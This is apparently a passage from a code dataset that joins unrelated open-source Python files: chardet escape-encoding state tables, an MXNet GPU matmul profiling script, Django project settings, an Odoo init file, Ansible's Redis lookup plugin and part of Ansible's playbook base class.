eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 08-0f
eItsMe,eItsMe,eError,eError,eStart,eStart, 4,eError,# 10-17
5,eError, 6,eError, 5, 5, 4,eError,# 18-1f
4,eError, 4, 4, 4,eError, 4,eError,# 20-27
4,eItsMe,eStart,eStart,eStart,eStart,eStart,eStart,# 28-2f
)
# HZ is a 7-bit escape encoding: no multi-byte classes, so every
# character-length entry is 0.
HZCharLenTable = (0, 0, 0, 0, 0, 0)
# Model bundle consumed by the escape-sequence CodingStateMachine.
HZSMModel = {'classTable': HZ_cls,
'classFactor': 6,
'stateTable': HZ_st,
'charLenTable': HZCharLenTable,
'name': "HZ-GB-2312"}
ISO2022CN_cls = (
2,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,0,0,0,0, # 20 - 27
0,3,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,4,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
2,2,2,2,2,2,2,2, # 80 - 87
2,2,2,2,2,2,2,2, # 88 - 8f
2,2,2,2,2,2,2,2, # 90 - 97
2,2,2,2,2,2,2,2, # 98 - 9f
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,2, # f8 - ff
)
ISO2022CN_st = (
eStart, 3,eError,eStart,eStart,eStart,eStart,eStart,# 00-07
eStart,eError,eError,eError,eError,eError,eError,eError,# 08-0f
eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,# 10-17
eItsMe,eItsMe,eItsMe,eError,eError,eError, 4,eError,# 18-1f
eError,eError,eError,eItsMe,eError,eError,eError,eError,# 20-27
5, 6,eError,eError,eError,eError,eError,eError,# 28-2f
eError,eError,eError,eItsMe,eError,eError,eError,eError,# 30-37
eError,eError,eError,eError,eError,eItsMe,eError,eStart,# 38-3f
)
ISO2022CNCharLenTable = (0, 0, 0, 0, 0, 0, 0, 0, 0)
ISO2022CNSMModel = {'classTable': ISO2022CN_cls,
'classFactor': 9,
'stateTable': ISO2022CN_st,
'charLenTable': ISO2022CNCharLenTable,
'name': "ISO-2022-CN"}
ISO2022JP_cls = (
2,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,2,2, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,7,0,0,0, # 20 - 27
3,0,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
6,0,4,0,8,0,0,0, # 40 - 47
0,9,5,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
2,2,2,2,2,2,2,2, # 80 - 87
2,2,2,2,2,2,2,2, # 88 - 8f
2,2,2,2,2,2,2,2, # 90 - 97
2,2,2,2,2,2,2,2, # 98 - 9f
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,2, # f8 - ff
)
ISO2022JP_st = (
eStart, 3,eError,eStart,eStart,eStart,eStart,eStart,# 00-07
eStart,eStart,eError,eError,eError,eError,eError,eError,# 08-0f
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 10-17
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,# 18-1f
eError, 5,eError,eError,eError, 4,eError,eError,# 20-27
eError,eError,eError, 6,eItsMe,eError,eItsMe,eError,# 28-2f
eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,# 30-37
eError,eError,eError,eItsMe,eError,eError,eError,eError,# 38-3f
eError,eError,eError,eError,eItsMe,eError,eStart,eStart,# 40-47
)
ISO2022JPCharLenTable = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
ISO2022JPSMModel = {'classTable': ISO2022JP_cls,
'classFactor': 10,
'stateTable': ISO2022JP_st,
'charLenTable': ISO2022JPCharLenTable,
'name': "ISO-2022-JP"}
ISO2022KR_cls = (
2,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,3,0,0,0, # 20 - 27
0,4,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,5,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
2,2,2,2,2,2,2,2, # 80 - 87
2,2,2,2,2,2,2,2, # 88 - 8f
2,2,2,2,2,2,2,2, # 90 - 97
2,2,2,2,2,2,2,2, # 98 - 9f
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,2, # f8 - ff
)
ISO2022KR_st = (
eStart, 3,eError,eStart,eStart,eStart,eError,eError,# 00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 08-0f
eItsMe,eItsMe,eError,eError,eError, 4,eError,eError,# 10-17
eError,eError,eError,eError, 5,eError,eError,eError,# 18-1f
eError,eError,eError,eItsMe,eStart,eStart,eStart,eStart,# 20-27
)
ISO2022KRCharLenTable = (0, 0, 0, 0, 0, 0)
ISO2022KRSMModel = {'classTable': ISO2022KR_cls,
'classFactor': 6,
'stateTable': ISO2022KR_st,
'charLenTable': ISO2022KRCharLenTable,
'name': "ISO-2022-KR"}
# flake8: noqa
| gpl-3.0 |
solin319/incubator-mxnet | example/profiler/profiler_matmul.py | 25 | 2489 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import mxnet as mx
import argparse
import os, sys
import time
import numpy as np
def parse_args():
    """Build the benchmark's command-line parser and parse sys.argv."""
    parser = argparse.ArgumentParser(
        description='Set network parameters for benchmark test.')
    parser.add_argument('--profile_filename', type=str,
                        default='profile_matmul_20iter.json')
    # The three iteration-control options share type and only differ in
    # their defaults.
    for flag, default in (('--iter_num', 100),
                          ('--begin_profiling_iter', 50),
                          ('--end_profiling_iter', 70)):
        parser.add_argument(flag, type=int, default=default)
    return parser.parse_args()
args = parse_args()
if __name__ == '__main__':
    # Symbolic-mode profiling: trace data is written to the JSON file given
    # on the command line.
    mx.profiler.profiler_set_config(mode='symbolic', filename=args.profile_filename)
    print('profile file save to {0}'.format(args.profile_filename))
    # Build a 4096x4096 GEMM graph and bind it on the second GPU (gpu(1)).
    A = mx.sym.Variable('A')
    B = mx.sym.Variable('B')
    C = mx.symbol.dot(A, B)
    executor = C.simple_bind(mx.gpu(1), 'write', A=(4096, 4096), B=(4096, 4096))
    a = mx.random.uniform(-1.0, 1.0, shape=(4096, 4096))
    b = mx.random.uniform(-1.0, 1.0, shape=(4096, 4096))
    a.copyto(executor.arg_dict['A'])
    b.copyto(executor.arg_dict['B'])
    flag = False  # NOTE(review): never read afterwards; looks like dead code.
    print("execution begin")
    for i in range(args.iter_num):
        # Only iterations in [begin_profiling_iter, end_profiling_iter) are
        # captured by the profiler and included in the timing below.
        if i == args.begin_profiling_iter:
            # NOTE(review): time.clock() was removed in Python 3.8; on
            # modern interpreters this needs time.perf_counter().
            t0 = time.clock()
            mx.profiler.profiler_set_state('run')
        if i == args.end_profiling_iter:
            t1 = time.clock()
            mx.profiler.profiler_set_state('stop')
        executor.forward()
        c = executor.outputs[0]
        # wait_to_read() blocks until the asynchronous GEMM has finished, so
        # the loop measures real execution, not just enqueueing.
        c.wait_to_read()
    print("execution end")
    # NOTE(review): t0/t1 raise NameError here unless begin_profiling_iter
    # and end_profiling_iter both fall inside range(iter_num) -- there is no
    # argument validation upstream; confirm intended usage.
    duration = t1 - t0
    print('duration: {0}s'.format(duration))
    print('          {0}ms/operator'.format(duration*1000/args.iter_num))
| apache-2.0 |
pilnujemy/pytamy | config/settings/common.py | 2 | 10472 | # -*- coding: utf-8 -*-
"""
Django settings for foundation project.
For more information on this file, see
https://docs.djangoproject.com/en/dev/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/dev/ref/settings/
"""
from __future__ import absolute_import, unicode_literals
import environ
ROOT_DIR = environ.Path(__file__) - 3 # (/a/b/myfile.py - 3 = /)
APPS_DIR = ROOT_DIR.path('foundation')
# Settings below are read through django-environ so deployments can override
# them with environment variables.
env = environ.Env()
# APP CONFIGURATION
# ------------------------------------------------------------------------------
DJANGO_APPS = (
    # Default Django apps:
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.sites',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'django.contrib.flatpages',
    # Useful template tags:
    'django.contrib.humanize',
    # Admin
    'django.contrib.admin',
)
THIRD_PARTY_APPS = (
    'dal',
    'dal_select2',
    'crispy_forms', # Form layouts
    'allauth', # registration
    'allauth.account', # registration
    'allauth.socialaccount', # registration
    'django_tables2',
    'django_states',
    'teryt_tree',
    'bootstrap_pagination',
    'taggit',
    'djmail',
    'ckeditor',
    'django_mailbox',
    'django_basic_tinymce_flatpages',
)
# Apps specific for this project go here.
LOCAL_APPS = (
    'foundation.main',
    'foundation.users',
    'foundation.offices',
    'foundation.offices.emails',
    'foundation.teryt',
    'foundation.correspondence',
    'foundation.cases',
    'foundation.letters',
    'foundation.press',
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps
# Local apps are listed first so their templates/static files win lookups.
INSTALLED_APPS = LOCAL_APPS + THIRD_PARTY_APPS + DJANGO_APPS
# MIDDLEWARE CONFIGURATION
# ------------------------------------------------------------------------------
MIDDLEWARE_CLASSES = (
    # Make sure djangosecure.middleware.SecurityMiddleware is listed first
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
# MIGRATIONS CONFIGURATION
# ------------------------------------------------------------------------------
MIGRATION_MODULES = {
    'sites': 'foundation.contrib.sites.migrations'
}
# DEBUG
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = env.bool("DJANGO_DEBUG", False)
# FIXTURE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS
FIXTURE_DIRS = (
    str(APPS_DIR.path('fixtures')),
)
# EMAIL CONFIGURATION
# ------------------------------------------------------------------------------
# NOTE(review): this assignment is overridden by the djmail EMAIL_BACKEND set
# near the bottom of this module, so the DJANGO_EMAIL_BACKEND env var has no
# effect here.
EMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND', default='django.core.mail.backends.smtp.EmailBackend')
# MANAGER CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = (
    ("""Adam Dobrawy""", 'naczelnik@jawnosc.tk'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
# DATABASE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
    # Raises ImproperlyConfigured exception if DATABASE_URL not in os.environ
    'default': env.db("DATABASE_URL", default="mysql:///foundation"),
}
DATABASES['default']['ATOMIC_REQUESTS'] = True
# GENERAL CONFIGURATION
# ------------------------------------------------------------------------------
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'Europe/Warsaw'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = 'pl-pl'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
# TEMPLATE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#templates
TEMPLATES = [
    {
        # See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-TEMPLATES-BACKEND
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
        'DIRS': [
            str(APPS_DIR.path('templates')),
        ],
        'OPTIONS': {
            # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
            'debug': DEBUG,
            # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-loaders
            # https://docs.djangoproject.com/en/dev/ref/templates/api/#loader-types
            'loaders': [
                'django.template.loaders.filesystem.Loader',
                'django.template.loaders.app_directories.Loader',
            ],
            # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.template.context_processors.i18n',
                'django.template.context_processors.media',
                'django.template.context_processors.static',
                'django.template.context_processors.tz',
                'django.contrib.messages.context_processors.messages',
                # Your stuff: custom template context processors go here
            ],
        },
    },
]
# See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = 'bootstrap3'
# STATIC FILE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = str(ROOT_DIR('staticfiles'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
    str(APPS_DIR.path('static')),
)
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = (
    'django.contrib.staticfiles.finders.FileSystemFinder',
    'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
# MEDIA CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = str(APPS_DIR('media'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
# URL Configuration
# ------------------------------------------------------------------------------
ROOT_URLCONF = 'config.urls'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'config.wsgi.application'
# AUTHENTICATION CONFIGURATION
# ------------------------------------------------------------------------------
AUTHENTICATION_BACKENDS = (
    'django.contrib.auth.backends.ModelBackend',
    'allauth.account.auth_backends.AuthenticationBackend',
)
# Some really nice defaults
ACCOUNT_AUTHENTICATION_METHOD = 'username'
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_EMAIL_VERIFICATION = 'mandatory'
# Custom user app defaults
# Select the correct user model
AUTH_USER_MODEL = 'users.User'
LOGIN_REDIRECT_URL = 'users:redirect'
LOGIN_URL = 'account_login'
# SLUGLIFIER
AUTOSLUG_SLUGIFY_FUNCTION = 'atom.ext.slugify.slugifier.ascii_slugify'
# LOGGING CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#logging
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    'filters': {
        'require_debug_false': {
            '()': 'django.utils.log.RequireDebugFalse'
        }
    },
    'handlers': {
        'mail_admins': {
            'level': 'ERROR',
            'filters': ['require_debug_false'],
            'class': 'django.utils.log.AdminEmailHandler'
        }
    },
    'loggers': {
        'django.request': {
            'handlers': ['mail_admins'],
            'level': 'ERROR',
            'propagate': True,
        },
    }
}
TAGGIT_CASE_INSENSITIVE = True
# Your common stuff: Below this line define 3rd party library settings
# djmail wraps outgoing mail; the real SMTP backend it delegates to is
# configured via DJMAIL_REAL_BACKEND just below. This supersedes the
# EMAIL_BACKEND default defined earlier in this file.
EMAIL_BACKEND = "djmail.backends.default.EmailBackend"
DJMAIL_REAL_BACKEND = "django.core.mail.backends.smtp.EmailBackend"
MAILBOX_RECEIVING_PROTOTYPE = 'sprawa-{id}@pytamy.pilnujemy.info'
BLEACH_DEFAULT_WIDGET = 'ckeditor.widgets.CKEditorWidget'
BLEACH_ALLOWED_TAGS = [
    # bleach default
    'a',
    'abbr',
    'acronym',
    'b',
    'blockquote',
    'code',
    'em',
    'i',
    'li',
    'ol',
    'strong',
    'ul',
    # extra
    'br',
    'p',
    'u',
    'div',
]
CKEDITOR_CONFIGS = {
    'default': {
        'toolbar': 'Custom',
        'toolbar_Custom': [
            ['Bold', 'Italic', 'Underline'],
            ['NumberedList', 'BulletedList', '-', 'Blockquote'],
            ['Link', 'Unlink'],
            ['RemoveFormat', 'Source']
        ]
    }
}
DJANGO_MAILBOX_STORE_ORIGINAL_MESSAGE = True
FLATPAGE_WIDGET = 'ckeditor.widgets.CKEditorWidget'
FLATPAGE_KWARGS = {}
| bsd-3-clause |
mlaitinen/odoo | addons/gamification/models/__init__.py | 389 | 1038 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013 OpenERP SA (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import goal
import challenge
import res_users
import badge
| agpl-3.0 |
woltage/ansible | lib/ansible/plugins/lookup/redis_kv.py | 69 | 2504 | # (c) 2012, Jan-Piet Mens <jpmens(at)gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import re
# redis-py is an optional dependency: record whether it is importable so
# run() can raise a friendly AnsibleError instead of a raw ImportError.
HAVE_REDIS=False
try:
    import redis # https://github.com/andymccurdy/redis-py/
    HAVE_REDIS=True
except ImportError:
    pass
from ansible.errors import AnsibleError
from ansible.plugins.lookup import LookupBase
# ==============================================================
# REDISGET: Obtain value from a GET on a Redis key. Terms
# expected: 0 = URL, 1 = Key
# URL may be empty, in which case redis://localhost:6379 assumed
# --------------------------------------------------------------
class LookupModule(LookupBase):
    """Lookup plugin returning the value of a Redis GET for each term.

    Each term is ``"<url>,<key>"``; an empty URL falls back to
    ``redis://localhost:6379``. A failed connection or missing key yields an
    empty string, preserving the plugin's historical best-effort behaviour.
    """

    def run(self, terms, variables, **kwargs):

        if not HAVE_REDIS:
            raise AnsibleError("Can't LOOKUP(redis_kv): module redis is not installed")

        if not isinstance(terms, list):
            terms = [ terms ]

        ret = []
        for term in terms:
            (url, key) = term.split(',')
            if url == "":
                url = 'redis://localhost:6379'

            # urlsplit on Python 2.6.1 is broken. Hmm. Probably also the reason
            # Redis' from_url() doesn't work here.
            p = '(?P<scheme>[^:]+)://?(?P<host>[^:/ ]+).?(?P<port>[0-9]*).*'

            try:
                m = re.search(p, url)
                host = m.group('host')
                # The port group may match the empty string (e.g. a URL such
                # as "redis://localhost"); fall back to the default port
                # instead of letting int('') raise an unhandled ValueError.
                port = int(m.group('port') or 6379)
            except AttributeError:
                raise AnsibleError("Bad URI in redis lookup")

            try:
                conn = redis.Redis(host=host, port=port)
                res = conn.get(key)
                if res is None:
                    res = ""
                ret.append(res)
            except Exception:
                # Narrowed from a bare "except:" so KeyboardInterrupt and
                # SystemExit still propagate; lookup stays best-effort.
                ret.append("")  # connection failed or key not found
        return ret
| gpl-3.0 |
CedarLogic/ansible | lib/ansible/playbook/base.py | 17 | 18079 | # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import itertools
import operator
import uuid
from functools import partial
from inspect import getmembers
from io import FileIO
from six import iteritems, string_types, text_type
from jinja2.exceptions import UndefinedError
from ansible.errors import AnsibleParserError
from ansible.parsing import DataLoader
from ansible.playbook.attribute import Attribute, FieldAttribute
from ansible.template import Templar
from ansible.utils.boolean import boolean
from ansible.utils.debug import debug
from ansible.utils.vars import combine_vars, isidentifier
from ansible.template import template
class Base:
    """Common machinery for playbook objects (Play, Block, Task, ...).

    Subclasses declare ``FieldAttribute`` class members; this base class
    turns them into instance properties, loads their values from parsed
    YAML datastructures, validates and templates them, and supports
    copy/(de)serialization.
    """

    # connection/transport
    _connection = FieldAttribute(isa='string')
    _port = FieldAttribute(isa='int')
    _remote_user = FieldAttribute(isa='string')
    # variables
    _vars = FieldAttribute(isa='dict', default=dict(), priority=100)
    # flags and misc. settings
    _environment = FieldAttribute(isa='list')
    _no_log = FieldAttribute(isa='bool')
    # param names which have been deprecated/removed
    DEPRECATED_ATTRIBUTES = [
        'sudo', 'sudo_user', 'sudo_pass', 'sudo_exe', 'sudo_flags',
        'su', 'su_user', 'su_pass', 'su_exe', 'su_flags',
    ]

    def __init__(self):
        """Initialize an empty object; real values arrive via load_data()."""
        # initialize the data loader and variable manager, which will be provided
        # later when the object is actually loaded
        self._loader = None
        self._variable_manager = None
        # every object gets a random uuid:
        self._uuid = uuid.uuid4()
        # and initialize the base attributes
        self._initialize_base_attributes()
        # Prefer the CLI-created global display object when running under the
        # ansible entry points; fall back to a fresh Display otherwise.
        try:
            from __main__ import display
            self._display = display
        except ImportError:
            from ansible.utils.display import Display
            self._display = Display()

    # The following three functions are used to programatically define data
    # descriptors (aka properties) for the Attributes of all of the playbook
    # objects (tasks, blocks, plays, etc).
    #
    # The function signature is a little strange because of how we define
    # them. We use partial to give each method the name of the Attribute that
    # it is for. Since partial prefills the positional arguments at the
    # beginning of the function we end up with the first positional argument
    # being allocated to the name instead of to the class instance (self) as
    # normal. To deal with that we make the property name field the first
    # positional argument and self the second arg.
    #
    # Because these methods are defined inside of the class, they get bound to
    # the instance when the object is created. After we run partial on them
    # and put the result back into the class as a property, they get bound
    # a second time. This leads to self being placed in the arguments twice.
    # To work around that, we mark the functions as @staticmethod so that the
    # first binding to the instance doesn't happen.

    @staticmethod
    def _generic_g(prop_name, self):
        """Generic property getter; defers to a _get_attr_<name> hook if present."""
        method = "_get_attr_%s" % prop_name
        if hasattr(self, method):
            return getattr(self, method)()
        return self._attributes[prop_name]

    @staticmethod
    def _generic_s(prop_name, self, value):
        """Generic property setter: stores into the per-instance attribute dict."""
        self._attributes[prop_name] = value

    @staticmethod
    def _generic_d(prop_name, self):
        """Generic property deleter."""
        del self._attributes[prop_name]

    def _get_base_attributes(self):
        '''
        Returns the list of attributes for this class (or any subclass thereof).
        If the attribute name starts with an underscore, it is removed
        '''
        base_attributes = dict()
        for (name, value) in getmembers(self.__class__):
            if isinstance(value, Attribute):
                if name.startswith('_'):
                    name = name[1:]
                base_attributes[name] = value
        return base_attributes

    def _initialize_base_attributes(self):
        """Create a property on the class for every FieldAttribute and seed
        this instance with the attribute defaults."""
        # each class knows attributes set upon it, see Task.py for example
        self._attributes = dict()
        for (name, value) in self._get_base_attributes().items():
            getter = partial(self._generic_g, name)
            setter = partial(self._generic_s, name)
            deleter = partial(self._generic_d, name)
            # Place the property into the class so that cls.name is the
            # property functions.
            setattr(Base, name, property(getter, setter, deleter))
            # Place the value into the instance so that the property can
            # process and hold that value/
            setattr(self, name, value.default)

    def preprocess_data(self, ds):
        ''' infrequently used method to do some pre-processing of legacy terms '''
        # Walk the MRO so the most specific _preprocess_data_<class> hook wins.
        for base_class in self.__class__.mro():
            method = getattr(self, "_preprocess_data_%s" % base_class.__name__.lower(), None)
            if method:
                return method(ds)
        return ds

    def load_data(self, ds, variable_manager=None, loader=None):
        ''' walk the input datastructure and assign any values '''
        assert ds is not None
        # the variable manager class is used to manage and merge variables
        # down to a single dictionary for reference in templating, etc.
        self._variable_manager = variable_manager
        # the data loader class is used to parse data from strings and files
        if loader is not None:
            self._loader = loader
        else:
            self._loader = DataLoader()
        # call the preprocess_data() function to massage the data into
        # something we can more easily parse, and then call the validation
        # function on it to ensure there are no incorrect key values
        ds = self.preprocess_data(ds)
        self._validate_attributes(ds)
        # Walk all attributes in the class. We sort them based on their priority
        # so that certain fields can be loaded before others, if they are dependent.
        # FIXME: we currently don't do anything with private attributes but
        #        may later decide to filter them out of 'ds' here.
        base_attributes = self._get_base_attributes()
        for name, attr in sorted(base_attributes.items(), key=operator.itemgetter(1)):
            # copy the value over unless a _load_field method is defined
            if name in ds:
                method = getattr(self, '_load_%s' % name, None)
                if method:
                    self._attributes[name] = method(name, ds[name])
                else:
                    self._attributes[name] = ds[name]
        # run early, non-critical validation
        self.validate()
        # cache the datastructure internally
        setattr(self, '_ds', ds)
        # return the constructed object
        return self

    def get_ds(self):
        """Return the original datastructure this object was loaded from, or None."""
        try:
            return getattr(self, '_ds')
        except AttributeError:
            return None

    def get_loader(self):
        """Return the DataLoader supplied (or created) by load_data()."""
        return self._loader

    def get_variable_manager(self):
        """Return the variable manager supplied to load_data(), if any."""
        return self._variable_manager

    def _validate_attributes(self, ds):
        '''
        Ensures that there are no keys in the datastructure which do
        not map to attributes for this object.
        '''
        valid_attrs = frozenset(name for name in self._get_base_attributes())
        for key in ds:
            if key not in valid_attrs:
                raise AnsibleParserError("'%s' is not a valid attribute for a %s" % (key, self.__class__.__name__), obj=ds)

    def validate(self, all_vars=dict()):
        ''' validation that is done at parse time, not load time '''
